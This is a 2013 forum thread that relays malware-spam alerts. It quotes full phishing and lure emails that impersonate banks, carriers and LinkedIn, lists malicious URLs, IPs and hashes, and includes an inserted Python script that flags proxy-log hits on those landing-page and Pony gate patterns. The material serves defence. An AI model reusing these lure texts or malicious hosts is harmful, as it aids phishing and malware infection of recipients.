ghostsquad.altervista .org/gakmail.htm
ighjaooru .ru:8080/forum/links/column.php
iztakor .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f655c2a9de1f4e346920fc4127cc9a6a/tumblr_inline_mky16jesX41qz4rgp.png
:fear::mad:
AplusWebMaster
2013-04-09, 17:25
FYI...
Fake HP ScanJet SPAM / jundaio .ru
- http://blog.dynamoo.com/2013/04/hp-scanjet-spam-jundaioru.html
9 Apr 2013 - "This fake printer spam leads to malware on jundaio .ru:
Date: Tue, 9 Apr 2013 10:07:40 +0500 [01:07:40 EDT]
From: Scot Crump [ScotCrump @hotmail .com]
Subject: Re: Scan from a Hewlett-Packard ScanJet #0437
Attachment: HP-ScannedDoc.htm
Attached document was scanned and sent
to you using a HP HPAD-400812P.
SENT BY : Scot S.
PAGES : 9
FILETYPE: .HTM [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment HP-ScannedDoc.htm leads to malware on [donotclick]jundaio .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1894750
... Detected live BlackHole v2.0 exploit kit 91.191.170.26
- http://nakedsecurity.sophos.com/2013/04/04/has-your-hewlett-packard-scanjet-printer-just-tried-to-infect-your-pc-with-malware/
April 4, 2013
___
Fake BoA Bill Payment SPAM / BILL_04092013_Fail.exe
- http://blog.dynamoo.com/2013/04/unable-to-process-your-most-recent-bill.html
9 Apr 2013 - "This spam contains an attachment 04092013.zip which in turn contains a malicious file BILL_04092013_Fail.exe
Date: Tue, 9 Apr 2013 10:44:03 -0500 [11:44:03 EDT]
From: Bank of America [bill.payment @bankofamerica .com]
Subject: Unable to process your most recent Bill Payment
You have a new e-Message from Bank of America
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
Pay To Account Number: **********3454
Due Date: 05/01/2013
Amount Due: $ 508.60
Statement Balance: $ 2,986.26
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause. .
Please do not reply to this message. If you have any questions about the information in this e-Bill , please contact your Bill Pay customer support . For all other questions, call us at 800-887-5749.
Bank of America, N.A. Member FDIC. Equal Housing Lender
©2013 Bank of America Corporation. All rights reserved...
VirusTotal results are only 11/46*.
MD5: 3cb04da2747769460a7ac09d1be44fc6
SHA256: 141751e9ae18ec55c8cd71e2e464419f3030c21b21e3f0914b0b320adce3bf70
ThreatExpert reports** that the malware attempts to phone home to 64.34.70.31 and 64.34.70.32 (iDigital Internet Inc, Canada) and includes a keylogger."
* https://www.virustotal.com/en/file/141751e9ae18ec55c8cd71e2e464419f3030c21b21e3f0914b0b320adce3bf70/analysis/1365522944/
File name: BILL_04092013_Fail.exe
Detection ratio: 11/46
Analysis date: 2013-04-09
** http://www.threatexpert.com/report.aspx?md5=3cb04da2747769460a7ac09d1be44fc6
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d70d268c60fce31566a75c8a73fe28b0/tumblr_inline_ml0415dYQ91qz4rgp.png
___
Malicious American Airlines Spam
- http://threattrack.tumblr.com/post/47544751293/malicious-american-airlines-spam
April 9, 2013 - "Subjects Seen:
Please download your ticket #[removed]
Typical e-mail details:
Customer Notification
Your bought ticket is attached to the letter as a scan document.
To use your ticket you should Download It .
Malicious URLs
bikemania .org/components/.5wl0rb.php?request=ss00_323
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3ef8e1da24b73673aa9ff90d05d8abdd/tumblr_inline_mkzwnbhOy21qz4rgp.png
___
Fake LinkedIn SPAM / jonahgkio .ru
- http://blog.dynamoo.com/2013/04/linkedin-spam-jonahgkioru.html
9 Apr 2013 - "This fake LinkedIn spam leads to malware on jonahgkio .ru:
Date: Tue, 9 Apr 2013 10:03:31 -0300
From: "service @paypal .com" [service @paypal .com]
Subject: Join my network on LinkedIn
LinkedIn
Marcelene Bruno has indicated you are a Friend
I'd like to add you to my professional network on LinkedIn.
- Marcelene Bruno
Accept
View invitation from Marcelene Bruno
WHY MIGHT CONNECTING WITH Marcelene Bruno BE A GOOD IDEA?
Marcelene Bruno's connections could be useful to you
After accepting Marcelene Bruno's invitation, check Marcelene Bruno's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
© 2012, LinkedIn Corporation
The link leads to a malicious payload on [donotclick]jonahgkio .ru:8080/forum/links/column.php which doesn't seem to be working at the moment. However, it is multihomed on some familiar looking IPs:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ..."
___
Fake Intuit SPAM / juhajuhaa .ru
- http://blog.dynamoo.com/2013/04/intuit-spam-juhajuhaaru.html
9 Apr 2013 - "This fake Intuit spam leads to malware on juhajuhaa .ru:
Date: Tue, 9 Apr 2013 11:21:18 -0430 [11:51:18 EDT]
From: Tagged [Tagged @taggedmail .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Tue, 9 Apr 2013 11:21:18 -0430.
Finances would be gone away from below account # ending in 6780 on Tue, 9 Apr 2013 11:21:18 -0430
amount to be seceded: 4053 USD
Paychecks would be procrastinated to your personnel accounts on: Tue, 9 Apr 2013 11:21:18 -0430
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The link in the email goes through a legitimate but hacked site to a malware landing page at [donotclick]juhajuhaa .ru:8080/forum/links/column.php (report here*) hosted on some familiar-looking IP addresses that we saw earlier:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ...
* http://urlquery.net/report.php?id=1900207
... Detected suspicious URL pattern... Blackhole 2 Landing Page 91.191.170.26
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/07085e6981b95f10a1cb4d56a04d57de/tumblr_inline_ml0a50NPus1qz4rgp.png
___
Top porn sites lead to malware
- http://blog.dynamoo.com/2013/04/top-porn-sites-lead-to-malware.html
9 Apr 2013 - "... the greatest risk comes from external sites such as crakmedia .com (report*), trafficjunky .net (report**) and traffichaus .com (report***) plus several others. These too are intermediaries being abused by third parties.. but this is part of the problem with poorly regulated banner ads and traffic exchangers. Bad things slip into pages easily, and very few people want to kick up a fuss... If you are going to look at the shady side of the web, then it is very important to make sure that your system is fully patched... and a combination of Firefox + NoScript is very good at locking down your browser (note that this isn't really for novices). Logging in as something other than an administrator can also help to reduce the impact of malware.. and of course a good and up-to-date anti-virus or security package is essential."
(More detail at the dynamoo URL above.)
* http://www.google.com/safebrowsing/diagnostic?site=crakmedia.com
** http://www.google.com/safebrowsing/diagnostic?site=trafficjunky.net
*** http://www.google.com/safebrowsing/diagnostic?site=traffichaus.com
___
"Your naked photos online" SPAM ...
- https://www.net-security.org/malware_news.php?id=2460
Apr 9, 2013 - "Malware peddlers continue to use the old "your naked photos online" lure to trick users into following malicious links or downloading malicious attachments, warns Total Defense's* Alex Polischuk. The attached EPS00348.zip file contains an executable of the same name, and sports an icon depicting a natural landscape in order to trick the user into opening it. Unfortunately for those who do, the file is actually a backdoor Trojan that also has the ability to download additional malware onto the compromised computer, allowing the attackers to have total control of it and using it for their own malicious purposes. As always, users are advised -never- to follow links or download files contained in unsolicited emails - no matter the claims they contain and how urgent they sound."
* http://www.totaldefense.com/blogs/2013/04/08/Win32/GysA-Trojan.aspx
:mad:
AplusWebMaster
2013-04-10, 19:08
FYI...
Massive Google scam sent by email to Colombian domains
- https://isc.sans.edu/diary.html?storyid=15586
Last Updated: 2013-04-10 21:01:28 UTC - "... supposedly good news from a resume they sent to google looking for open positions:
> https://isc.sans.edu/diaryimages/images/diary1.png
... The file referenced in the e-mail is zip compressed, MD5 4e85b6c9e9815984087f6722498a6dfc. Once uncompressed, you get document.exe, MD5 3e41ab7c70701452d046b93f764564ec. This file is widely recognized by VirusTotal with a 40/46 detection ratio. It is a mass mailer with backdoor capabilities. The mass mailer malware description can be found at http://home.mcafee.com/virusinfo/virusprofile.aspx?key=153521#none and the backdoor description can be found at http://home.mcafee.com/virusinfo/virusprofile.aspx?key=100938 ... people complained about very slow internet links without performing any download operations. If you were affected by this malware, please keep in mind the following recommendations:
- Do not *ever* open attachments from not reliable sources, especially zipped files that have inside exe files. Nothing good can come from it.
- Do not disable any security controls inside your computer like host IPS, antivirus and personal firewall. If you require to work with software that is blocked by any of these controls and there is no way to enable it through them, it is definitely something you should consider not to use.
- Malware can control your machine and handle your machine as desired, affecting confidentiality, integrity, availability, traceability and non repudiation of your information. Avoid performing actions that could materialize such risks like dealing with p2p software."
___
Malware sites to block 10/4/13
- http://blog.dynamoo.com/2013/04/malware-sites-to-block-10413.html
10 April 2013 - "These domains and IPs are associated with the Amerika gang and are related to this spam run*. Blocking them would be prudent.
46.4.150.96/27
46.161.0.235
93.170.130.241 ..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/04/icann-thanks-for-malware-spam.html
___
Fake credit line SPAM / judianko .ru
- http://blog.dynamoo.com/2013/04/your-credit-line-percent-was-changed.html
10 April 2013 - "I haven't seen this one before. It leads to malware on judianko.ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 10 April 2013 14:24
Subject: Re: Your credit line percent was changed.
We apologize, but we must raise percent of your credit line up to 22,5%. We would be like to make it lower, but the situation on the market today is not so good, because of it we can not handle other way.
Under this link you can view a details about changing of contract
The link goes through a legitimate but hacked site to [donotclick]judianko .ru:8080/forum/links/column.php (report here*) hosted on:
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1915010
... Detected suspicious URL pattern... Blackholev2 redirection successful 188.65.178.27
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5ce6a9a2c40a0811d9113a3f23176d8f/tumblr_inline_ml1pmu79cq1qz4rgp.png
___
Fake BBB SPAM / jamiliean .ru
- http://blog.dynamoo.com/2013/04/bbb-spam-jamilieanru.html
10 April 2013 - "This fake BBB spam leads to malware on jamiliean .ru:
From: Habbo Hotel [mailto:auto-contact @habbo .com]
Sent: 10 April 2013 00:17
Subject: Re: Better Business Bureau Complaint
Good afternoon,
Here with the Better Business Bureau would like to inform you that we have received a complaint (ID 24941954)
from a customer of yours in regard to their dealership with you.
Please open the COMPLAINT REPORT attached to this email (Internet Exlporer file)
to view the details on this issue and suggest us about your position as soon as possible.
We hope to hear from you shortly.
Regards,
CHRISTI REAGAN
Dispute Counselor
Better Business Bureau
There is an attachment BBB-Complaint-US39824.htm; the malicious payload is at [donotclick]jamiliean .ru:8080/forum/links/column.php. Associated payload, IPs and domains are the same as this attack* also running today."
* http://blog.dynamoo.com/2013/04/your-credit-line-percent-was-changed.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/203632be385daa25748a0225f939f786/tumblr_inline_ml1m5i6Jcz1qz4rgp.png
___
Fake Verizon Wireless SPAM / jamtientop .ru
- http://blog.dynamoo.com/2013/04/verizon-wireless-spam-jamtientopru.html
10 Apr 2013 - "This fake Verizon Wireless spam leads to malware on jamtientop .ru:
Date: Wed, 10 Apr 2013 01:14:51 +0100 [04/09/13 20:14:51 EDT]
From: DorianBottom @hotmail .com
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 1332
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
Viewing your utilization
Upgrade your tariff
Manage Account Members
Pay for your bill
And much, much more...
© 2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information
The link goes through a hacked legitimate site to a malicious landing page at [donotclick]jamtientop.ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1919123
... Detected suspicious URL pattern... Blackholev2 redirection 185.5.185.129
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/418106bda1e1f92a9c472a6c7c285d32/tumblr_inline_ml3gtfQaTS1qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-04-11, 19:15
FYI...
Fake Changelog SPAM / juliaroberzs .ru
- http://blog.dynamoo.com/2013/04/changelog-spam-juliaroberzsru.html
11 Apr 2013 - "This spam leads to malware on juliaroberzs .ru:
Date: Thu, 11 Apr 2013 02:46:13 +0100
From: Mayola Phipps via LinkedIn [member@linkedin.com]
Subject: Re: changelog UPD.
Attachments: changelog.htm
Good morning,
as promised changelog is attached (Internet Explorer format)
The attachment changelog.htm leads to a malicious landing page at [donotclick]juliaroberzs .ru:8080/forum/links/column.php (report here*) hosted on some familiar IPs**:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1927055
... Detected suspicious URL pattern... Blackhole 2 Landing Page
** http://blog.dynamoo.com/2013/04/verizon-wireless-spam-jamtientopru.html
___
Malicious Xanga Spam
- http://threattrack.tumblr.com/post/47700390846/malicious-xanga-spam
11 Apr 2013 - "Subjects Seen:
Gracelyn [removed] is your new friend!
Typical e-mail details:
Hey [removed]!
Now that you are friends with Gracelyn, you can:
• Share a memory of Gracelyn
• Post on Gracelyn’s Chatboard
• More…
Have fun!
The Xanga Team
Malicious URLs
degsme .lv/settingss.htm
janasika .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ab250b773de94e71af31ae181eb2bc4f/tumblr_inline_ml3g59LAQw1qz4rgp.png
___
Fake UPS SPAM / juliamanako .ru
- http://blog.dynamoo.com/2013/04/ups-spam-juliamanakoru.html
11 Apr 2013 - "This fake UPS spam leads to malware on juliamanako .ru:
Date: Thu, 11 Apr 2013 11:58:33 -0300 [10:58:33 EDT]
From: Aida Tackett via LinkedIn [member@linkedin.com]
Subject: United Postal Service Tracking Nr. H9544862721
Your USPS CUSTOMER SERVICES for big savings! Can't see images? CLICK HERE.
UPS - UPS Customer Services
UPS UPS SUPPORT 56
UPS - UPS MANAGER 67 >> UPS - UPS SUPPORT 501
Already Have an Account?
Enjoy all UPS has to offer by linking your My UPS profile to your account.
Link Your Account Now >>
UPS - UPS Customer Services
Good day, [redacted].
DEAR CONSUMER , We were not able to delivery the postal package
Track your Shipment now!
Pack it. Ship ip. No calculating , UPS .com Customer Services.
Shipping Tracking Calculate Time & Cost Open an Account
@ 2011 United Parcel Service of America, Inc. USPS Customer Services, the UPS brandmark, and the color brown are
trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to
USPS .COM marketing e-mail. For information on UPS's privacy practices, please refer to UPS Privacy Policy.
USPS Services, 04 Glenlake Parkway, NE - Atlanta, GA 30324
Attn: Customer Communications Department
The link goes through a legitimate -hacked- site to a malicious landing page at [donotclick]juliamanako .ru:8080/forum/links/column.php hosted on:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
___
Malicious QuickBooks Overdue Payment SPAM
- http://threattrack.tumblr.com/post/47715184510/malicious-quickbooks-overdue-payment-spam
April 11, 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 04/11/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Rusty Coffey
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ab54fe807059c2f52bc1f44fce1a6a14/tumblr_inline_ml3tavRi9P1qz4rgp.png
Also: http://security.intuit.com/alert.php?a=79
Last updated 4/11/2013
:mad::fear:
AplusWebMaster
2013-04-12, 16:47
FYI...
Fake American Airlines emails lead to malware
- http://blog.webroot.com/2013/04/12/american-airlines-you-can-download-your-ticket-themed-emails-lead-to-malware/
April 12, 2013 - "Cybercriminals are currently spamvertising tens of thousands of emails impersonating American Airlines in an attempt to trick its customers into thinking that they’ve received a download link for their E-ticket. Once they download and execute the malicious attachment, their PCs automatically join the botnet operated by the cybercriminal/gang of cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/04/american_airlines_email_spam_malware_malicious_software_social_engineering.png
... Detection rate for the malicious executable: MD5: f17ee7f9a0ec3d7577a148ae79955d6a * ... Mal/Weelsof-D..."
(Long list of malware C&C IPs available at the webroot URL above.)
* https://www.virustotal.com/en/file/cde3818cd9ca51efbee700a75e63ce19c3da364c96afe07d7ca01e66f6f7d3ac/analysis/
File name: f17ee7f9a0ec3d7577a148ae79955d6a
Detection ratio: 27/46
Analysis date: 2013-04-11
___
Chase Bank Credentials Phish
- http://threattrack.tumblr.com/post/47779166917/chase-bank-credentials-phish
April 12, 2013 - "Subjects Seen:
Chase Online: Site Maintenance Notification
Typical e-mail details:
Dear Customer:
As part of our commitment to protecting the security of your account, we routinely verify online profile details. We’re writing you to confirm your Chase account details.
Your account security is important to us, so we appreciate your prompt attention to this matter. Attached is a form to help complete this process. Download the form and follow the instructions.
We are here to assist you anytime. Your account security is our priority. Thank you for choosing Chase.
Sincerely,
Jennifer Myhre
Senior Vice President
Chase Consumer Banking
Malicious URLs
myasfalisi .gr/images/sampledata/chase.js
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/21b85811cd757088f3c853a5214191cc/tumblr_inline_ml59iz6iGe1qz4rgp.png
___
Malicious Wells Fargo Wire Transfer Spam
- http://threattrack.tumblr.com/post/47793089795/malicious-wells-fargo-wire-transfer-spam
April 12, 2013 - "Subjects Seen:
International Wire Transfer File Not Processed
Typical e-mail details:
We are unable to process your International Wire Transfer request due to insufficient funds in the identified account.
Review the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 04/12/2013 03:00 pm PT, the file may not be processed.
Please view the attached file for more details on this transaction.
Any email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557).
Event Message ID: [removed]
Date/Time Stamp: Fri, 12 Apr 2013 12:44:47 -0500
Malicious URLs
94.32.66.114 /ponyb/gate.php
116.122.158.195 :8080/ponyb/gate.php
embryo-india .com/24gwq.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/054a51efa2e81b8d7762b32ba46d501f/tumblr_inline_ml5ly6oQum1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-04-15, 17:54
FYI...
Malicious PayPal Receipt Spam
- http://threattrack.tumblr.com/post/48039323240/malicious-paypal-recipt-spam
April 15, 2013 - "Subjects Seen:
Receipt for your PayPal payment to [removed]
Typical e-mail details:
Hello,
You sent a payment of $149.49 USD to [removed] ([removed])
Thanks for using PayPal. To see all the transaction details, log in to your PayPal account.
It may take a few moments for this transaction to appear in your account.
Malicious URLs
matsum .info/wp-content/plugins/akismet/wp-status.php?1HJN2KC56FN7C
lacunanotifies .net/closest/incomming_message.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9e913cc7d9e2328a7065961ea66a607f/tumblr_inline_mlatxyS1Ce1qz4rgp.png
___
Malicious USPS Delivery Failure Spam
- http://threattrack.tumblr.com/post/48042515379/malicious-usps-delivery-failure-spam
April 15, 2013 - "Subjects Seen:
USPS delivery failure report
Typical e-mail details:
Notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: [removed]
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
serw.myroitracking .com/24gwq.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8a0a0746575d9df0bef8842d39825b63/tumblr_inline_mlax8nNDsw1qz4rgp.png
___
Bank of America Credentials Phish
- http://threattrack.tumblr.com/post/48066113572/bank-of-america-credentials-phish
April 15, 2013 - "Subjects Seen:
Please confirm your information
Typical e-mail details:
We have decided to put an extra verification process to ensure your identity and your account security.
Please click here to continue the verification process and ensure your account security.
Malicious URLs
safe.bankofamerica .logon.canadapenfund.ca/ - 216.227.221.247*
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7edcf07c7af60b46d89ce413460168ff/tumblr_inline_mlbf8ctoUs1qz4rgp.png
* http://urlquery.net/report.php?id=2023194
Diagnostic page for AS15244 (ADDD2NET)
- https://www.google.com/safebrowsing/diagnostic?site=AS:15244
"Of the 23067 site(s) we tested on this network over the past 90 days, 1138 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-04-15, and the last time suspicious content was found was on 2013-04-15... Over the past 90 days, we found 173 site(s) on this network... that appeared to function as intermediaries for the infection of 516 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 157 site(s)... that infected 602 other site(s)..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake USPS Delivery Failure Notification E-mail Messages - 2013 Apr 15
Fake Tax Refund Notification E-mail Messages - 2013 Apr 15
Fake Product Quotation Document E-mail Messages - 2013 Apr 15
Fake Product Inquiry With Attached Sample Design E-mail Messages - 2013 Apr 15
Fake Portuguese Account Regularization Notification E-mail Messages - 2013 Apr 15
Fake Wire Transfer Notification E-mail Messages - 2013 Apr 15
Fake Western Union Money Compensation Notification E-mail Messages - 2013 Apr 15
Fake CashPro Online Digital Certificate Notification E-mail Messages - 2013 Apr 15
Fake Italian Malicious Link E-mail Messages - 2013 Apr 15
Fake Tax Return Submission Notification E-mail Messages - 2013 Apr 15
Fake Credentials Reset Notification E-mail - 2013 Apr 15
Fake Purchase Order Notification E-mail Messages - 2013 Apr 15
Fake Bill Notification E-mail Messages - 2013 Apr 15
Fake Document Sharing E-mail Messages - 2013 Apr 15
(Links and more detail at the cisco URL above.)
:mad::fear:
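The dynamoo posts above keep pointing at one landing-page shape (a .ru host on port 8080 serving /forum/links/column.php), and the ThreatTrack posts at Pony check-ins ending in /ponyb/gate.php. The Python below is an added example, not code from the thread or from the blogs it quotes: it scans constructed proxy-log lines for those two URL shapes and for the blocklist IPs quoted above, so an analyst can find clients that reached a landing page even when the mail itself slipped through. The log format and the client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit

# IPs taken from the dynamoo blocklists quoted in the posts above.
BLOCKLIST_IPS = {
    "91.191.170.26", "93.187.200.250", "208.94.108.238",
    "185.5.185.129", "188.65.178.27",
}

# Blackhole landing pages in the RU:8080 campaign: <name>.ru, port 8080, this exact path.
BLACKHOLE_PATH = "/forum/links/column.php"
# Pony check-in URLs quoted in the ThreatTrack posts end in /ponyb/gate.php.
PONY_PATH_RE = re.compile(r"/ponyb/gate\.php$")


def classify_url(url):
    """Return a short reason if the URL matches a pattern from the thread, else None.

    Raises ValueError for an unparsable port; scan_proxy_log treats that as no match.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in BLOCKLIST_IPS:
        return "host on dynamoo blocklist"
    if host.endswith(".ru") and parts.port == 8080 and parts.path == BLACKHOLE_PATH:
        return "ru:8080 Blackhole landing page"
    if PONY_PATH_RE.search(parts.path):
        return "Pony gate check-in"
    return None


def scan_proxy_log(lines):
    """Scan lines of the form '<time> <client_ip> <method> <url> <status>' (assumed format)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line, skip rather than guess
        time, client, url = fields[0], fields[1], fields[3]
        try:
            reason = classify_url(url)
        except ValueError:
            reason = None  # garbage port such as ':abc'; not a match we can trust
        if reason:
            hits.append({"time": time, "client": client, "url": url, "reason": reason})
    return hits


def summarize(hits):
    """Group flagged client addresses by reason, which is what an analyst triages first."""
    summary = {}
    for hit in hits:
        summary.setdefault(hit["reason"], set()).add(hit["client"])
    return {reason: sorted(clients) for reason, clients in summary.items()}


# Constructed proxy log: hosts and paths mirror the shapes quoted in the posts above.
SAMPLE_LOG = [
    "2013-04-11T14:02:11 10.0.0.21 GET http://www.example.com/index.html 200",
    "2013-04-11T14:02:13 10.0.0.21 GET http://jonahgkio.ru:8080/forum/links/column.php 200",
    "2013-04-11T14:02:15 10.0.0.35 GET http://jonahgkio.ru/forum/links/column.php 404",
    "2013-04-12T09:10:00 10.0.0.40 POST http://116.122.158.195:8080/ponyb/gate.php 200",
    "2013-04-12T09:11:02 10.0.0.40 GET http://91.191.170.26/somepage.html 200",
    "2013-04-12T09:12:44 10.0.0.12 GET http://bad.ru:abc/x 200",
]


if __name__ == "__main__":
    flagged = scan_proxy_log(SAMPLE_LOG)
    for hit in flagged:
        print(hit["time"], hit["client"], hit["reason"], hit["url"])
    print(summarize(flagged))
```

The same-host-without-port line is deliberately left unflagged: the campaign's landing pages were only ever seen on :8080, and widening the rule to any .ru path invites false positives.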
AplusWebMaster
2013-04-16, 22:59
FYI...
Fake "Fiserv Secure Email Notification" spam
- http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
April 16, 2013 - "This spam has an encrypted ZIP file attached that contains malware. The passwords and filenames will vary.
From: Fiserv Secure Notification [mailto:secure.notificationi@fiservi.com]
Sent: Tue 16/04/2013 14:02
Subject: [WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5
You have received a secure message
Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - KsUs3Z921mA
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to mobile@res.fiserv.com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.979.7673.
2000-2013 Fiserv Secure Systems, Inc. All rights reserved.
In the case of the sample I have seen, there is an attachment Case_CC3DK9WJW8IG0F5.zip which unzips using the supplied password to Case_Fiserv_04162013.exe (note the date is encoded into the filename).
At the time of writing, VirusTotal results are just 5/46*. The Comodo CAMAS report is here**, the ThreatExpert report here***... seems to be a Zbot variant.
The bad IPs involved are: ...
Recommended blocklist: ..."
* https://www.virustotal.com/en/file/3143dbfbcf608abbdeb5449da38c2c5bcdb1f4873ea2c229da2e921c5b071764/analysis/1366120267/
File name: Case_Fiserv_04162013.exe
Detection ratio: 5/46
Analysis date: 2013-04-16 13:51:07 UTC
** http://camas.comodo.com/cgi-bin/submit?file=3143dbfbcf608abbdeb5449da38c2c5bcdb1f4873ea2c229da2e921c5b071764
*** http://www.threatexpert.com/report.aspx?md5=dc858edc930a76e79ce7562d7b0564f9
___
Malicious American Airlines Spam Continues
- http://threattrack.tumblr.com/post/48126962744/malicious-american-airlines-spam-continues
April 16, 2013 - "Subjects Seen:
Your order has been completed
Order #[removed]
Typical e-mail details:
Customer Notification
Your bought ticket is attached to the letter as a scan document.
To use your ticket you should Download It .
Malicious URLs
caprica-toysncomics .com/components/.a9iifi.php?request=ss00_323
caprica-toysncomics .com/components/.a9iifi.php?ticket=844_220641690
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e76f2abb145f24c92979977610248b09/tumblr_inline_mlcwasuTUq1qz4rgp.png
___
Malicious NACHA, ACH Transfer Spam
- http://threattrack.tumblr.com/post/48132294179/malicious-nacha-ach-trasnfer-spam
April 16, 2013 - "Subjects Seen:
Your ACH transfer
Typical e-mail details:
The ACH process (ID: [removed]), recently requested from your checking account (by you), was rejected by the recepient’s bank.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b8cfbc79a043326677dea1e5da2db491/tumblr_inline_mld0q6LxuS1qz4rgp.png
___
Fake Boston Marathon Scams - Update
